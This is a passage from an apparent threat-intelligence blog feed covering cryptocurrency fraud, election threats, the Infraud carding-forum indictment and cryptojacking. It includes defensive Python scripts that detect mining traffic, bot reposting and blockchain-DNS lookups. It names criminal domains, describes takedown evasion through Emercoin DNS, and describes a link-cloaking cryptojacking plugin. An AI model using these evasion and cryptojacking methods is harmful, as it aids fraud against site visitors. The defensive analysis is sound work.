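# Constructed proxy log lines (hosts and addresses are documentation ranges / placeholders).
SAMPLE_PROXY_LOG = [
    '2018-03-01T12:00:00Z 10.0.0.12 -> 203.0.113.9:3333 {"id":1,"method":"mining.subscribe","params":["cpuminer/2.5"]}',
    '2018-03-01T12:00:01Z 10.0.0.12 -> 203.0.113.9:3333 {"id":2,"method":"mining.authorize","params":["worker1","x"]}',
    '2018-03-01T12:01:00Z 10.0.0.31 -> 198.51.100.44:5555 {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"xmrig/2.5"}}',
    '2018-03-01T12:02:00Z 10.0.0.40 -> 192.0.2.77:443 {"id":7,"method":"getUser","params":{"login":"alice"}}',
    '2018-03-01T12:03:00Z 10.0.0.41 -> 192.0.2.78:80 GET /index.html',
]

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
    for a in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(a)
```

The page-content check belongs in a web proxy or a browser extension's blocklist pipeline; the Stratum check is only possible where the traffic is visible in clear text (plain TCP pools, or TLS terminated at the proxy), so for encrypted pools fall back to destination reputation and the distinctive pattern of long-lived connections to ports such as 3333 and 5555.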


Despite their volatility, high valuations, looming regulation measures and the projected adoption of cryptocurrency in both online and physical transactions, cryptocurrency fraud will not go away any time soon. However, greater education about cryptocurrencies and the risks associated with them for consumers and organizations can go a long way to fighting this trend. Digital Shadows will continue to watch this evolving space, providing research and advice that can help users navigate the Wild West that is the cryptocurrency world.

To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

Protecting Your Brand: Return on Investment Tue, 27 Feb 2018 16:29:23 +0000 Last week I was joined by Brett Millar, Director of Global Brand Protection for Fitbit, for a webinar on “Protecting Brands from Digital Risks and the Dark Web”. It was great to hear how Brett works with different business functions to address different risks to the Fitbit brand. Most of all, I loved hearing about the different ways in which Brand Managers can demonstrate a return on investment (ROI).

Brand Protection

For organizations looking to safeguard their brands online, there are lots of online sources where this occurs. Within the webinar I spoke about the threats to brands that exist on the dark web, specifically account takeover and counterfeit goods. Dark web marketplaces, such as Dream Market shown below, have whole sections dedicated to the sale of counterfeit goods. Of course, there is a lot more to brand protection than dark web activity. Organizations need to be monitoring a wide range of sources to adequately protect their brands online. (Check out a blog from our CMO, Dan Lowden, on some specific instances of brand exposure that we’ve seen involving spoof domains, fake mobile applications, and fake social media profiles.)


Figure 1: A dedicated counterfeit category on the Dream Market, with over 2,800 goods for sale


Affecting the Bottom Line

ROI (Return on Investment) is a common term in security, but effectively demonstrating it is difficult. One reason for this is that ROI is a calculation usually expressed numerically or as a percentage. The impact of your security investment, however, does not always lend itself to quantifiable metrics. It is always trickier trying to show how events that have not happened, like cyber attacks that have been averted, impact a company’s net earnings or bottom line.

The concept of ROI is just as critical for brand protection; Brand Managers need to be able to show they are impacting the bottom line. The good news is that the result of your brand protection strategy is measurable, and there are three main ways to do just that.

  1. Direct revenue return. This is the most clear-cut way of demonstrating ROI. Investigations launched by an organization’s fraud team into counterfeit sites can lead to proceeds flowing back into the company. This typically occurs through settlements, judgement amounts, and restitution amounts. This approach is pretty easy to quantify.
  2. Loss prevention. This is the other side of the same coin as direct revenue return. Stopping an activity that was costing the company $X million per year prevents this loss from recurring.
  3. Indirect revenue. If an increase in revenue for a particular product coincides with an increased effort to remove counterfeits of that product on gray and black markets, it can be inferred that there may have been some sort of causation. This is harder to quantify but it can, nonetheless, be valuable.

These metrics can be supplemented with other metrics, such as tracking the number of:

  • Cease and Desist letters sent
  • Audits performed
  • Sites taken down
  • Custom site seizures

With so many areas of security to focus on, demonstrating a return on investment is a constant challenge. However, the intersection of brand management and security offers a real opportunity to demonstrate the economic value of protecting your brand online.

Watch the webinar on “Protecting Brands from Digital Risks and the Dark Web” to find out more about other types of brand exposure and ways organizations can manage this risk.

    Shadow Talk Update – 02.26.2018 Mon, 26 Feb 2018 15:51:21 +0000 In this week’s podcast, the Digital Shadows Research Team discuss attacks against banks using the SWIFT network, business email compromise (BEC) threats, the state of ransomware, as well as new activity by thedarkoverlord and APT-37.



    Two new thefts using SWIFT network confirmed

    Over the past week, an unidentified Russian bank and India’s City Union Bank confirmed that recent fraudulent SWIFT banking transfer requests had been submitted, attempting to steal $8 million. Specifics of malware deployment, and the perpetrators’ tactics, techniques and procedures (TTPs), are among the many unknown details. Previous SWIFT attacks have been attributed to “Lazarus Group”, although several financially motivated actors have likely made similar theft attempts. Targeting this transfer system remains profitable, and further theft attempts are likely.


    Business email compromise campaign targets Fortune 500 companies

    Fortune 500 companies, ranked among the highest-revenue companies in the United States, have been subject to an ongoing BEC campaign. Targets operated in the retail, healthcare, financial and professional services sectors. Campaign operators have allegedly stolen “millions of dollars” using spearphishing and advanced social engineering techniques; no malware was involved.


    Extortion actor thedarkoverlord publicizes new targets

    The threat actor thedarkoverlord has returned after a three-month hiatus. Recent Twitter activity suggests targeting of a US public school union, a US law firm, and un-specified Hollywood companies. Thedarkoverlord has previously conducted a number of extortion campaigns, largely against the United States healthcare sector. Digital Shadows cannot establish the veracity of these new claims, but it is likely that thedarkoverlord is attempting to gain new publicity by threatening high-profile targets.


    Ransomware remains a threat to organizations in all industries

    The “Saturn” ransomware-as-a-service (RaaS) variant has been active in February. Saturn RaaS does not require a sign-up fee; instead, its developers take 30% of the ransom collected from each successful infection. In other ransomware news, the Colorado Department of Transportation (CDOT) was affected by a SamSam ransomware infection on 21 February 2018. This infection reportedly disrupted 2,000 computers owned by CDOT; however, CDOT stated it will not pay the ransom and is restoring from system backups.


    North Korea-linked espionage group APT-37 continues to evolve

    Cyber security company FireEye reported the continued activity and evolution of “APT-37” (aka Reaper), an allegedly North Korea-linked threat group motivated by information theft and espionage. FireEye’s research also linked APT-37 activity to that reported for other threat actors, including “Group 123” and “ScarCruft”, although exact details were unclear. APT-37 has mainly targeted the technology and healthcare sectors in South Korea, but has also targeted organizations in Japan, Vietnam and the Middle East. APT-37 will likely continue its information-gathering campaigns in the short to mid term (one to six months), and more information about the group may emerge during that time.

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Threats to the Upcoming Italian Elections Thu, 22 Feb 2018 17:08:26 +0000 On 5 March Italian citizens will go to the polls to vote in a general election, following the dissolution of the Italian Parliament by President Sergio Mattarella on 28 December 2017. Italy has been led by a caretaker government under Paolo Gentiloni of the Democratic Party (PD), previously foreign minister, since the resignation of former Prime Minister Matteo Renzi. Renzi stepped down following the loss of a referendum on constitutional reforms in December 2016.

    This March will see the use of a new electoral system, one designed to favor coalitions by requiring the governing party to gain over 40% of the vote, thus making it harder for a single party to win a majority in Italy’s notoriously divided parliament. No party has yet polled above 40%, with a centre-right alliance formed by Silvio Berlusconi currently polling at approximately 35%.

    Under the growing cloud cast by reports of network intrusions against political parties during the 2016 United States presidential election, as well as claims of a Kremlin-backed influence campaign in favour of the Front National in the French elections, political events are coming under more and more scrutiny for nefarious activity. In this blog we will assess the confirmed examples of cyber attacks that we have observed, and look back at activity seen during previous elections to forecast the type of activity we can expect. This includes hacktivism, network intrusions, data leaks and disinformation.


    1. Hacktivism

    Hacktivist actors are most often motivated by public attention, either for themselves, or the issues they claim to represent. Hacktivist attacks generally take the form of denial of service (DoS) attempts, website defacements, and the curation of open source data to appear like a data leak. The Anonymous collective has had an ongoing #OpItaly campaign since January 2017, when Italian law enforcement arrested two individuals charged with cyber espionage against politicians, public institutions, and commercial entities. The activities of the group have not yet targeted political parties, but may use the publicity surrounding the elections as a platform to gain public attention.

    Further factions of the collective, such as the Italian hacktivist group AnonPlus, have specifically targeted the elections, releasing personally identifiable information of regional PD members and defacing PD websites. However, their impact so far has been limited and is unlikely to have any lasting effect on the elections themselves: the ‘leaked’ data was already available from open sources, and the website defacements did not cause any persistent disruption.

    More sophisticated threat actors have targeted the Rousseau platform used by the Movimento 5 Stelle (M5S) party. #Hack5Stelle is a campaign focused on leaking names, passwords and datasets associated with the platform, driven by both financial and political motives.


    Figure 1: Twitter account offering allegedly hacked Movimento5Stelle database for sale


    Figure 2: Landing page for the Rousseau platform


    2. Network Intrusions

    Actors may seek to target political parties or government organizations in order to exfiltrate sensitive data for use in political campaigns. Given alleged Russian involvement in the network intrusions against the Democratic Party in the US, and the signing of a collaboration agreement between the far-right party Lega Nord and Vladimir Putin’s United Russia party, it is plausible that a similar threat may be present during the Italian elections. Fraught relations between Russia, NATO and the EU, combined with Lega Nord’s anti-EU platform, mean that the Italian elections are likely to present a target for Russian espionage campaigns. Furthermore, large financial institutions may be targeted given the focus on the economy and the currency in this year’s election.

    Social engineering and spear phishing remain the most successful attack vectors for network intrusions, and this is unlikely to change for the Italian elections.


    3. Data leaks

    While a number of activist groups have leaked open source databases of local political parties, a more sophisticated threat actor could release sensitive or confidential information in order to bias political opinion. Such information can be obtained in a number of ways and be used by a variety of threat actors, including both ideologically motivated individuals and nation state groups. Phishing and social engineering attempts, network intrusions, and document theft from insiders are all ways in which threat actors may seek to obtain such data. We detected no data leak campaigns relating to the Italian elections at the time of writing.


    4. Disinformation

    False media reporting, also known as the fake news phenomenon, is increasingly used by threat actors to sway or alter public political opinion. Such activity uses a wide variety of platforms, including legitimate or spoofed social media accounts on Facebook and Twitter, and interweaves legitimate reporting with exaggerated or false stories. During the French elections we observed one such case, in which a spoofed website impersonating the legitimate Belgian newspaper Le Soir published articles alleging that Saudi Arabia was financing Emmanuel Macron’s campaign. We outlined the easy availability of such tools in our previous report, The Business of Disinformation.

    Although no legitimate newspaper has reported being cloned during the Italian elections, a number of Twitter accounts related to Wikileaks Italy (@Wikileaks_Ita, to which the main WikiLeaks account has denied any official association) have been tweeting news relating to the current Eni bribery investigations. The account uses a combination of real news reports and rumours to allege former Prime Minister Renzi’s involvement in criminal activity. Although Renzi is not standing in this election, such an allegation has a reputational impact on the PD, Renzi’s party.


    Figure 3: Twitter account impersonating WikiLeaks used to spread articles on corruption investigations


    Furthermore, fake accounts on Twitter and Facebook used in the referendum campaign in 2016 have been reanimated in support of Matteo Salvini, leader of the Lega Nord. A number of automated accounts have been linked to the party’s official Twitter feed, @LegaSalvini. Although these bots have not been used to publicize fake news, they have been used to bias or promote political opinions by artificially inflating the support and publicity accorded to Salvini.



    Figure 4: Examples of Twitter bots all used to publish the same posts in support of Matteo Salvini
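    The bot behaviour shown in Figure 4 (many accounts publishing the same post within minutes of each other) lends itself to a simple detection heuristic. The script below is an added example and not Digital Shadows code: it normalises post text (case, whitespace, tracking URLs), groups posts by normalised text, and reports clusters of at least MIN_ACCOUNTS distinct accounts whose posts fall inside a WINDOW. The posts, the thresholds and the account names are constructed assumptions; real collection would feed it API output.

```python
"""Flag clusters of accounts that publish identical text in near-lockstep.

Added example, not Digital Shadows code. SAMPLE_POSTS is constructed and the
thresholds MIN_ACCOUNTS / WINDOW are assumptions to tune per platform.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

MIN_ACCOUNTS = 3                # distinct accounts needed to call it a cluster
WINDOW = timedelta(minutes=10)  # every post in the cluster lands inside this span

URL_RE = re.compile(r"https?://\S+")
WS_RE = re.compile(r"\s+")


def normalise(text):
    """Collapse the trivial variations bot operators add to defeat exact-match
    deduplication: per-account tracking links, letter case and whitespace."""
    t = URL_RE.sub("<url>", text.lower())
    return WS_RE.sub(" ", t).strip()


def find_clusters(posts):
    """posts: iterable of (account, iso_timestamp, text).
    Returns one dict per normalised text for which >= MIN_ACCOUNTS distinct
    accounts posted it within WINDOW of each other (largest window kept)."""
    by_text = defaultdict(list)
    for account, ts, text in posts:
        by_text[normalise(text)].append((datetime.fromisoformat(ts), account))

    clusters = []
    for text, items in by_text.items():
        items.sort()  # time order; sliding window over identical-text posts
        start, best = 0, None
        for end in range(len(items)):
            while items[end][0] - items[start][0] > WINDOW:
                start += 1
            accounts = {acct for _, acct in items[start:end + 1]}
            if len(accounts) >= MIN_ACCOUNTS and (
                best is None or len(accounts) > len(best["accounts"])
            ):
                best = {
                    "text": text,
                    "accounts": sorted(accounts),
                    "first": items[start][0],
                    "last": items[end][0],
                }
        if best:
            clusters.append(best)
    return clusters


# Constructed sample: four accounts repost the same line (different tracking
# links, one lower-cased) within four minutes; one repeats it a day later;
# two organic users share a different line, below the threshold.
SAMPLE_POSTS = [
    ("acct_a1", "2018-02-20T09:00:00", "Big rally today, join us! https://t.example/abc #vote"),
    ("acct_a2", "2018-02-20T09:00:20", "Big rally today,  join us! https://t.example/def #vote"),
    ("acct_a3", "2018-02-20T09:01:05", "big rally today, join us! https://t.example/ghi #vote"),
    ("acct_a4", "2018-02-20T09:03:40", "Big rally today, join us! https://t.example/jkl #vote"),
    ("acct_a1", "2018-02-21T09:00:00", "Big rally today, join us! https://t.example/zzz #vote"),
    ("user_b", "2018-02-20T09:02:00", "Did anyone go to the rally?"),
    ("user_c", "2018-02-20T09:02:30", "Did anyone go to the rally?"),
]

if __name__ == "__main__":
    for c in find_clusters(SAMPLE_POSTS):
        print(f"{len(c['accounts'])} accounts, {c['first']} .. {c['last']}: {c['text']!r}")
        print("  ", ", ".join(c["accounts"]))
```

    Exact-text matching is deliberately strict; it catches the lockstep reposting in Figure 4 but not paraphrased content, and the window size trades sensitivity against false positives from genuinely viral posts, which tend to spread over hours rather than minutes.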


    So what?

    Despite ongoing concern surrounding elections, it is unlikely that outside threat actors will seek to interfere in an already chaotic process. Unlike the elections in France and Germany in 2017, the Italian electoral process is far more opaque, and the proliferation of smaller parties makes it difficult to say where an influence campaign could add value. Similarly, it is difficult to see which party an external threat actor would seek to favour, since none is likely to gain a clear lead and all have made conflicting public statements about the parties with whom they would be willing to cooperate.

    The most likely threat comes from domestic hacktivist campaigns: in addition to defacing party and official websites, groups may attempt DDoS attacks against election-related infrastructure, hindering the voting process.

    While the scenarios above remain unclear, organizations can help protect themselves against many of the techniques and threats described above. Mitigation measures include:

    • Providing adequate training for staff regarding the threat from spear phishing and social engineering attacks. This will mitigate against the most likely, but not the only, attack vectors for network intrusion and public data leaks.
    • Properly securing public facing applications and tracking activist campaigns.
    • Enforcing strong password security practices to reduce the likelihood of account takeovers.
    • Remaining skeptical about reported statistics and stories.

    Subscribe to our weekly newsletter to get the threat intelligence and research by Digital Shadows.

    Prioritize to Avoid Security Nihilism Tue, 20 Feb 2018 15:41:56 +0000 In many situations associated with cyber security, in particular defending an organization, it is easy to get overwhelmed with not only the sheer number of issues but also the complexity of the interconnections between them. Technical issues are inextricably linked with social, cultural and political issues. Confronted with this sea of obstacles, it’s easy to succumb to security nihilism: “nothing is ever good enough”, “offense always wins” or “security is a losing battle”. As a defender, it is crushing to see how even an average Red Team can rip apart your defences, another successful engagement for Team Red as your passwords tumble helplessly out of the Domain Controller!

    It’s a truism, if not a platitude, that “perfect is the enemy of good”, but I believe that this phrase takes on a new meaning in the world of cyber security. The answer to security nihilism is the art and science of prioritization. Since defenders cannot protect everything to an equal standard, trade-offs have to be made. Difficult decisions must be taken. But where to start? I would argue that the best place to start is with the reality of protecting your organization. By which I mean, a pragmatic focus on:

    1. The critical assets that your organization has
    2. The credible threats to those assets

    Threat modelling exercises are useful heuristics for roughly figuring out the critical assets and the credible threats. An organization that handles payment card data will have a different set of assets and threats from one that handles sensitive government data, or from one that regularly stores Protected Health Information (PHI). An organization’s security posture should be appropriate for the threats it realistically faces.

    In order for these threat modeling exercises, which are often table-top exercises, to have meaning, they must be grounded in reality. Not all threats that organizations face wield NSA-grade 0days. Not all organizations are routinely attacked by APT groups. But understanding how the attackers you actually face operate is essential. As The Grugq is fond of saying, “increase attacker costs!”. As defenders, we need to understand which tasks are costly for attackers and how to make those tasks even more expensive.

    Let’s see how standard TTPs (tactics, techniques, and procedures) used by a wide-variety of different threat actors can be made more expensive. We’ll start with a phishing campaign:



    Outside in, network-based attacks are also widely-used:



    Most organizations have key employees who are high-value targets for attackers and most organizations have externally facing systems, in particular Web applications. These assets are a good place to start. By understanding how attackers operate, we can establish some priorities about which actions as defenders we should take based upon the assets that we have and our knowledge of how attackers operate. As our capability matures, our assets can become more specific and nuanced and our understanding of attacker tradecraft similarly develops. Robust fundamentals, however, never go out of style!


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 02.19.2018 Mon, 19 Feb 2018 21:42:21 +0000 In this week’s Shadow Talk podcast, the Digital Shadows Research Team analyses new activity from the Lazarus Group, attacks on the Winter Games opening ceremony, the theft of $170 million from the Bitgrail cryptocurrency exchange, and two Outlook vulnerabilities.


    Lazarus Group continues to pursue theft and espionage 

    New Lazarus Group activity reported this week shows that the threat group remains highly active and motivated by financial theft, information theft and espionage. The group has been linked to the financially motivated HaoBao campaign, which targeted Bitcoin users, and to the development of two trojan variants, “HardRain” and “BadCall”. The targeting of cryptocurrency marks a relatively recent evolution in Lazarus Group’s tactics, techniques and procedures (TTPs); the trojans indicate the group’s sustained interest in espionage tooling. Digital Shadows expects the group to continue to target cryptocurrency trading platforms within the next one to six months.


    Winter Olympics ‘targeted with Olympic Destroyer’ malware 

    Cyber security researchers have identified a sample of what they assess to be the malware used during the opening ceremony of the 2018 Olympic Winter Games. The attack disrupted Wi-Fi in the stadium and press center. Despite its limited effects, the malware appears technically complex and uses varied techniques, including hardcoded credentials to enable lateral movement between systems. Competing and conflicting reports have linked the campaign to North Korea, China and/or Russia, but there has been insufficient evidence to definitively implicate any threat actor.


    BitGrail reports USD 170 million cryptocurrency loss

    The BitGrail cryptocurrency exchange suffered an attack in which 17 million Nano Tokens (USD 170 million) were allegedly lost. Prior to the disclosure of the attack, BitGrail suspended all withdrawals and deposits of several cryptocurrencies and announced new security measures. Subsequently, a series of heated disagreements have sprung up between the creators of Nano Token and the BitGrail exchange, with neither accepting responsibility for the loss, and both accusing the other of suspicious behavior. Such disagreements will likely prevent customers from reclaiming the value of their tokens. The fallout from the attack will likely strengthen the call to regulate cryptocurrencies and their methods of exchange.


    RCE vulnerability affects MS Outlook

    Microsoft (MS) has released descriptions of two vulnerabilities affecting its Outlook software. One is CVE-2018-0852, a memory corruption vulnerability allowing remote code execution (RCE) if a user opens a crafted malicious file. The second is CVE-2018-0850, a privilege escalation vulnerability. Although neither has been detected being exploited in the wild, both affect multiple versions of MS Outlook; given Outlook’s ubiquity, it is likely that criminals will seek to exploit them.

    Listen to the full podcast here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Infraud Forum Indictment and Arrests: What it Means Thu, 15 Feb 2018 17:44:48 +0000 On 07 February 2018, the U.S. Department of Justice unveiled an indictment dated 31 October 2017 against 36 individuals associated with the Infraud Forum, a cybercriminal forum specializing in payment card fraud. This was the result of an operation known as “Shadow Web”, described as “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.” The members of the forum are alleged to have caused over $500 million in actual losses.

    In the context of last year’s seizure of AlphaBay and Hansa dark web marketplaces, what does this mean for the evolution of the criminal ecosystem, and what is the potential impact on organizations?

    Figure 1: A screenshot of infraud[.]wf, one of the latest editions of the Infraud Forum. Screenshot taken on 7 February 2018.


    Humble beginnings

    The Infraud forum has been through many incarnations, and there are several domains still carrying the Infraud name. The term “infraud”, however, first appeared on a WordPress blog known as the “infraud underground carders blog”. The earliest post on this site is dated 31 October 2010. These initial posts mainly provided advice on carding and ATM fraud, as well as reposts of news articles on criminal and fraudulent activity.

    The first reference on this blog to a dedicated Infraud site appeared on 11 November 2010, when a post was added offering downloads of a ZeuS crimeware toolkit. The post contained a link to a thread on infraud[.]ws.

    On 24 November 2010, a new post was added to the site claiming that the name of the group behind the blog had changed to “Ministry of Fraudulently Affairs”.


    Figure 2: Screenshot of Infraud underground carders blog


    A post added on 07 December 2010 claimed that the infraud[.]ws domain had been blocked after being reported for hosting malware and fraudulent content. The next day, the Infraud domain changed from infraud[.]ws to infraud[.]su.

    As of 03 March 2011, the blog advised users to only visit hxxps://infraud[.]cc.


    Figure 3: Post made on Infraud blog advising users to visit infraud[.]cc, a domain registered on 30 November 2010


    The name Ministry of Fraudulently Affairs also appears on a separate LiveJournal blog site (hxxp://infraud.livejournal[.]com) where advertisements and links to the infraud[.]cc site were posted.

    The “Infraud Journal” user profile for this blog site contained a link to the infraud[.]cc website and a Twitter account that is now suspended. The user stated their location as Borispol, Ukraine and used the Buddhist symbol Om as a logo. The account was created on 30 October 2010 and was last updated on 05 August 2014.


    Figure 4: infraud profile on Infraud Journal blog


    Online profiles using the “infraud” naming started appearing frequently across several criminal forums in December 2010 and January 2011. Many of these profiles used details and indicators previously used on the WordPress and Infraud Journal blogs, including the names “infraud” or “Ministry of Fraudulently Affairs”, and the Om Buddhist symbol as a profile picture. In this example from 26 January 2011 (below), the user infraud advertised an IP address and domains associated with the Infraud operation.


    Figure 5: Post made to hpc[.]name forum by user “infraud” containing links to various infraud domains


    How it worked

    Between 2010 and 2018, the Infraud Forum switched to several different top level domains and attracted large numbers of members to the forum (Brian Krebs puts this number at almost 11,000).

    The reputation of the forum also grew; a vendor with a presence on Infraud would have added legitimacy.  Even some of the most reputable Automated Vending Carts (AVCs) – such as the popular site Joker’s Stash – sought a presence on the Infraud Forum (see below). While Infraud was not unique in this respect – Verified, Omerta, and Exploit are other examples of forums where vendors look to establish a reputation – it was certainly a significant player.


    Figure 6: Post by JokerStash on wtl[.]pw


    In order to facilitate these vendors, the forum had a specific section for vendors to advertise. Vendors like Unnicat, Dark4sys, and Deputat (all also named in the indictment) had a presence here.

    The site extended beyond being simply a collection of credit card vendors, with separate exchanger and escrow services also available. Users could access these services at different access levels, such as VIP.


    Figure 7: A screenshot of Infraud[.]cc



    The Infraud Forum is another example of the level of professionalization that exists within the criminal underground. This forum was clearly highly hierarchical and relied on its extensive networks and reputation to make a lot of money.

    Many of the aliases disclosed in the indictment were at one point active across a host of different underground forums, including the AlphaBay forum. Although the full details of the law enforcement operation have not yet been released, it’s possible that the seizure of AlphaBay in 2017 provided valuable intelligence in this operation. Nevertheless, news that 36 prominent cybercriminals – who were active across several sites – have been closely monitored by international authorities will act as a further blow for the criminal community, which is still dealing with the impact of the AlphaBay and Hansa seizures.

    The impact of this announcement should be placed in context. Of the 36 individuals named in the indictment, only 13 have been apprehended. Indeed, although the site infraud[.]wf appears to have been seized, some sites run by vendors on the Infraud Forum remain active, such as d4rksys[.]cc (see Figure 8 below), a site allegedly run by dark3r. The same is true of sites run by Unnicat and Deputat. This is a reminder that, although Infraud was a significant player, many more forums and AVCs remain in operation, and the closure of one site simply means criminal actors migrate to other forums.


    Figure 8: A screenshot of d4rksys[.]cc, taken on 07 February 2018.

    Shifts within the criminal ecosystem

    Given the increased attention from law enforcement, it’s possible we will see more forums turning to new technologies to reduce the likelihood of domain seizure. Joker’s Stash has already moved its site hosting to a blockchain-based domain name system (DNS) provided by the cryptocurrency Emercoin. We’ve seen adverts demonstrating this change since around the end of September 2017, on multiple clear web carding forums.


    Figure 9: Joker’s Stash advert on carding forum with link and instructions to latest Blockchain DNS site


    The adverts direct users to a “Blockchain DNS” browser extension for Chrome and Firefox, which enables their users to connect to top level domains (TLDs) such as .bazar, .coin, .lib, .emc and others. Domains using these TLDs are not resolvable through the standard DNS hierarchy, so a browser without the extension cannot reach them. As Emercoin’s domain name records are fully decentralized, they cannot be altered, revoked or suspended by any authority; only a record’s owner can modify it or transfer it to another owner. The owners of Joker’s Stash therefore likely sought to avoid takedowns and other external disruption by moving to a blockchain-based solution.

    This is not the first example of threat actors using blockchain-based DNS. The operators of both the Necurs botnet and the point of sale (PoS) malware Kasidet have used the Namecoin peer-to-peer network (the .bit TLD), which has no central authority, likely to avoid law enforcement takedowns of their command and control (C2) infrastructure. For the owners of Joker’s Stash, Emercoin’s DNS may trump traditional DNS for the same reasons, but it still requires visitors to take additional steps to reach the site, and that may drive away some of its business. In the end, as with much of security, the benefit comes at the cost of ease of use.
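    Because neither Emercoin nor Namecoin names are resolvable through the normal DNS hierarchy, any sign of them in corporate telemetry is worth an alert. The script below is an added example, not Digital Shadows code: it looks for blockchain TLDs in two constructed log formats, a resolver query log (a host trying to resolve such a name through the corporate resolver will get NXDOMAIN, and the attempt itself is the signal) and a web proxy log (a host using the browser extension resolves out of band, so the name only shows up in the URL it then requests). The TLD table, the log layouts and the sample lines are assumptions.

```python
"""Spot blockchain-DNS names (Emercoin/Namecoin TLDs) in DNS and proxy logs.

Added example, not Digital Shadows code. Assumed: the TLD table (Emercoin
serves .coin/.emc/.lib/.bazar, Namecoin serves .bit) and the two constructed
log formats below.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

BLOCKCHAIN_TLDS = {
    "coin": "Emercoin",
    "emc": "Emercoin",
    "lib": "Emercoin",
    "bazar": "Emercoin",
    "bit": "Namecoin",
}

# Constructed resolver query-log shape: "<ts> <client-ip> query <qname> <qtype> <rcode>"
DNS_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qname>\S+)\s+(?P<qtype>\S+)\s+(?P<rcode>\S+)$"
)
# Constructed proxy-log shape: "<ts> <client-ip> <method> <url> <status>"
PROXY_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def blockchain_system(hostname):
    """Return 'Emercoin' / 'Namecoin' when the top-level label of hostname is a
    blockchain TLD, or None for ordinary names (and single-label names)."""
    labels = hostname.rstrip(".").lower().split(".")
    if len(labels) < 2 or not labels[-1]:
        return None
    return BLOCKCHAIN_TLDS.get(labels[-1])


def scan_dns_log(lines):
    """Return (client, qname, system, rcode) for every blockchain-TLD query.
    Lines that do not match the expected layout are skipped, not guessed at."""
    hits = []
    for line in lines:
        m = DNS_RE.match(line.strip())
        if not m:
            continue
        system = blockchain_system(m["qname"])
        if system:
            hits.append((m["client"], m["qname"].rstrip(".").lower(), system, m["rcode"]))
    return hits


def scan_proxy_log(lines):
    """Return (client, host, system) for every request to a blockchain-TLD host.
    This is the path that catches extension users, who never query the resolver."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line.strip())
        if not m:
            continue
        host = urlsplit(m["url"]).hostname or ""
        system = blockchain_system(host)
        if system:
            hits.append((m["client"], host, system))
    return hits


def clients_by_system(dns_hits, proxy_hits):
    """Group offending client IPs by naming system, for triage."""
    out = defaultdict(set)
    for client, _name, system, _rcode in dns_hits:
        out[system].add(client)
    for client, _host, system in proxy_hits:
        out[system].add(client)
    return {k: sorted(v) for k, v in out.items()}


# Constructed sample logs (not real traffic).
SAMPLE_DNS = [
    "2018-02-15T10:01:02Z 10.1.1.20 query www.example.com A NOERROR",
    "2018-02-15T10:01:05Z 10.1.1.20 query jstash.bazar A NXDOMAIN",
    "2018-02-15T10:02:10Z 10.1.1.31 query update.example.net A NOERROR",
    "2018-02-15T10:02:44Z 10.1.1.31 query c2-node.bit A NXDOMAIN",
    "2018-02-15T10:03:00Z 10.1.1.31 query shop.lib A NXDOMAIN",
    "garbage line that should be ignored",
]
SAMPLE_PROXY = [
    "2018-02-15T10:05:00Z 10.1.1.42 GET https://www.example.com/ 200",
    "2018-02-15T10:05:09Z 10.1.1.42 GET http://jstash.bazar/login 200",
    "2018-02-15T10:06:00Z 10.1.1.20 GET https://mirror.example.org/pkg.tar 200",
]

if __name__ == "__main__":
    dns_hits, proxy_hits = scan_dns_log(SAMPLE_DNS), scan_proxy_log(SAMPLE_PROXY)
    for hit in dns_hits:
        print("DNS  ", hit)
    for hit in proxy_hits:
        print("PROXY", hit)
    print(clients_by_system(dns_hits, proxy_hits))
```

    The proxy rule only works if the extension's traffic actually traverses the proxy, so pair it with an inventory check for the extension itself on managed browsers; the DNS rule is the cheaper of the two and catches users who followed a .bazar link without the extension installed.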


    No significant change anticipated

    Unfortunately, the reality is that this latest piece of news constitutes no real decrease in the threat posed to merchants, consumers and financial institutions from card fraud. Nevertheless, we will be keeping tabs on any changes that occur from these latest arrests, as the cybercriminal community bounces back from another setback. To find out more about the underground carding ecosystem, download a copy of our previous research report, Inside Online Carding Courses Designed for Cybercriminals.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Cryptojacking: An Overview Tue, 13 Feb 2018 17:59:17 +0000 What is Cryptojacking?

    Cryptojacking is the practice of hijacking a visitor’s browser to mine cryptocurrency with their computer’s processing power. Several pieces of software do this, including Coinhive, Authedmine and Crypto-Loot. While such tools are not necessarily illegal, their stealth and the lack of user consent have led many to treat cryptojacking scripts as malware; the security firm Malwarebytes, for example, blocks coinhive[.]com.

    This week it was announced that a number of government websites, including the NHS, had been serving cryptojacking malware, meaning that visitors had been unknowingly mining cryptocurrency.


    Monero mining is big business; browsers, extensions and mobile apps have all reportedly spread Coinhive in the past few months. Coinhive is a JavaScript miner for Monero, a cryptocurrency that has been steadily growing in popularity since 2014. In January 2018, a proof of concept called CoffeeMiner was released, which sits as a man-in-the-middle on a public Wi-Fi network and injects a miner script into the unencrypted web traffic of other users on that network.

    More recently, a malvertising campaign targeted Google’s DoubleClick advertising tool to compromise adverts and distribute Coinhive. The sharp increase in use of Coinhive miners correlated to an increase in traffic to five malicious domains, which was subsequently linked back to DoubleClick advertisements.

    Crypto Jacker: A New WordPress Plugin

    A new product called Crypto Jacker looks to combine Coinhive, Authedmine and Crypto-Loot into a WordPress plugin with added Search Engine Optimization (SEO) functionality. The domain cryptojacker[.]co was registered on November 30th, 2017 and sells a one-time licence for the Crypto Jacker software for $29. Once purchased, users can install Crypto Jacker on an unlimited number of their own domains.


    Figure 1: The Crypto Jacker software


    Crypto Jacker “provides a way to earn crypto currency from people who visit your links, even when you’re sharing other websites that you don’t own. We even cloak your website links for your (sic.) so they look like the original shares on social media.” This is done by using an iframe to display content cloned from a popular website, as shown in Figure 2.

    Figure 2: The user interface of the Crypto Jacker plug-in

